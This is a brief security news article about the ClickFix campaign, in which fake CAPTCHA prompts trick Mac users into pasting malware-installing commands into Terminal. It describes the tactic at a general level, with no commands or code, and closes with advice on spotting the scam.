Hackers are exploiting Mac users with a new social engineering tactic called ClickFix that disguises malware as CAPTCHA verification prompts. The attack tricks victims into opening Terminal and pasting commands that install malicious software capable of stealing passwords, browser data, and cryptocurrency wallets.

Security researchers first identified ClickFix campaigns in 2024, with detections surging over 500% by 2025. The technique has evolved from Windows-focused attacks to include macOS-specific variants that detect operating systems and display tailored instructions. Recent campaigns use countdown timers, video guides, and clipboard hijacking to increase infection rates.

Unlike traditional malware that relies on downloads, ClickFix shifts execution to the user by having them run commands through legitimate system tools like Terminal. This bypasses many security defenses since the activity appears normal. Security experts emphasize that legitimate CAPTCHA systems never ask users to open command interfaces or paste text, making this the clearest warning sign of a scam.